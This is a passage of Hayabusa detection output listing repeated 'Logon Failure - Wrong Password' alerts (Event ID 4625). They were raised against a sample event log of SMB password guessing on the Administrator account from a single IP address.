NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: 